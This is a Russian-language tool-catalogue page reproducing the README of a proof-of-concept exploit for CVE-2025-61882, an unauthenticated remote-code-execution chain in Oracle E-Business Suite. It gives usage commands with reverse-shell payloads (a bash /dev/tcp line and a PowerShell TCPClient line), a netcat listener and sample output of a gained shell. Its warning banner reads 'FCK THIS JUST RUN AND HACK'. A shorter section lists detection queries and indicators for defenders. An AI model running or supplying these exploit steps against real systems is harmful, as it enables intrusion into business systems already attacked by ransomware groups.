Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-61882-POC — Эксплойт для CVE-2025-61882 — критическая RCE-уязвимость до аутентификации в Oracle E-Business Suite. Сочетает SSRF, CRLF-инъекцию, HTTP-смагглинг и XSLT-инъекцию для удалённого выполнения кода без аутентификации. | Kitploit
Инструменты/GitHubGitHub/mindflarex/cve-2025-61882-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubmindflarex/cve-2025-61882-poc

CVE-2025-61882-POC

Эксплойт для CVE-2025-61882 — критическая RCE-уязвимость до аутентификации в Oracle E-Business Suite. Сочетает SSRF, CRLF-инъекцию, HTTP-смагглинг и XSLT-инъекцию для удалённого выполнения кода без аутентификации.

Репозиторий
23 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-61882 Инструмент для тестирования безопасности

CVSS Status Platform License

🚨 КРИТИЧЕСКОЕ ПРАВОВОЕ ПРЕДУПРЕЖДЕНИЕ

См. наш пост в блоге с техническими деталями

ЭТОТ ИНСТРУМЕНТ ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨   ║
║                                                              ║
║  By using this tool, you acknowledge and agree that:         ║
║                                                              ║
║                                                              ║
║                 FCK THIS JUST RUN AND HACK                   ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝

📋 Обзор

Инструмент для тестирования безопасности для CVE-2025-61882, критической уязвимости удалённого выполнения кода без аутентификации, затрагивающей Oracle E-Business Suite.

Автор: Mindflare

Детали уязвимости

  • CVE ID: CVE-2025-61882
  • Оценка CVSS: 9.8 (Критическая)
  • Вектор атаки: Сеть (без аутентификации)
  • Сложность атаки: Средняя
  • Требуемые привилегии: Нет
  • Взаимодействие с пользователем: Нет
  • Затронутые версии: Oracle E-Business Suite 12.2.3 – 12.2.14
  • Статус патча: Экстренный патч выпущен 4 октября 2025 года
  • Статус эксплуатации: ⚠️ АКТИВНО ЭКСПЛУАТИРУЕТСЯ программой-вымогателем Cl0p с августа 2025 года

Техническое резюме

CVE-2025-61882 — это сложная эксплойт-цепочка, объединяющая пять отдельных уязвимостей:

  1. SSRF — Подделка серверных запросов (Server-Side Request Forgery) через /OA_HTML/configurator/UiServlet
  2. CRLF-инъекция — внедрение HTTP-заголовков в параметр return_url
  3. HTTP-смагглинг — злоупотребление keep-alive соединением для доступа к внутренним сервисам (порт 7201)
  4. Обход аутентификации — обход пути через префикс /OA_HTML/help/../
  5. XSLT-инъекция — обработка вредоносного XSL-шаблона приводит к RCE

🎯 Предполагаемые сценарии использования

✅ Допустимое использование

  • Авторизованное тестирование на проникновение с письменного разрешения
  • Исследование безопасности систем, которыми вы владеете
  • Проверка уязвимостей в контролируемых лабораторных средах
  • Red team упражнения с надлежащей документацией по объёму работ
  • Академические исследования с одобрения учреждения
  • Реагирование на инциденты и криминалистический анализ

❌ Запрещённое использование

  • Любой несанкционированный доступ к системам
  • Тестирование систем без явного письменного разрешения
  • Вредоносные действия или причинение ущерба
  • Атаки на производственные системы без одобрения
  • Использование в преступных целях
  • Любая деятельность, нарушающая действующее законодательство

📦 Установка

Предварительные требования

  • Python 3.7 или выше
  • Менеджер пакетов pip
  • Сетевое подключение к цели (только авторизованное)
  • Netcat или аналогичный прослушиватель для получения обратной оболочки

Настройка

root@kitploit:~
# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC

# Install dependencies
pip3 install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py

🚀 Использование

Шаг 1: Настройка прослушивателя

В отдельном терминале запустите netcat-прослушиватель:

root@kitploit:~
# Linux/Mac
nc -lvnp 4444

# Windows
nc.exe -lvnp 4444

Шаг 2: Запуск инструмента

Базовое использование (цель Linux):

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
  --platform linux

Цель Windows:

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
  --platform windows

Параметры

ПараметрОписаниеОбязательныйПример
--targetЦелевой URL Oracle EBSДаhttp://192.168.1.22:8000
--lhostВаш IP-адрес (для обратных подключений)Да192.168.1.10
--lportПорт HTTP-сервера (обслуживает XSL-пейлоад)Да80 или 8080
--commandКоманда для выполнения на целиДаСм. примеры выше
--platformЦелевая ОС: linux или windowsДаlinux

📊 Пример вывода

Вывод инструмента

root@kitploit:~
[*] Target URL:    http://192.168.1.22:8000
[*] Listener IP:   192.168.1.10
[*] Listener Port: 80
[*] Platform:      linux

[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully

[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully

Вывод netcat-прослушивателя (если уязвим)

root@kitploit:~
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$

🛡️ Обнаружение и защита

Для специалистов по безопасности

Немедленные действия

  1. Примените экстренный патч Oracle (ID документа: 30061882.1)
  2. Ищите признаки компрометации:
    root@kitploit:~
    SELECT * FROM XDO_TEMPLATES_B 
    WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
    
  3. Просмотрите журналы доступа с августа 2025 года
  4. Заблокируйте исходящий интернет с серверов EBS

Индикаторы обнаружения

Сетевые IOC:

root@kitploit:~
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)

HTTP-паттерны:

  • POST /OA_HTML/configurator/UiServlet
  • POST /OA_HTML/SyncServlet
  • GET /OA_HTML/help/../*.jsp
  • CRLF-символы в параметрах

📚 Ссылки

  • Консультационное сообщение Oracle Security Alert
  • Каталог CISA KEV
  • Анализ Google/Mandiant
  • Исследование watchTowr Labs

📜 Лицензия

Лицензия MIT с ограничениями на образовательное использование — см. LICENSE

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Данное программное обеспечение предназначено только для авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен. Автор не несёт ответственности за неправомерное использование.


root@kitploit:~

**Created by:** Mindflare | **Last Updated:** October 2025
Скачать инструмент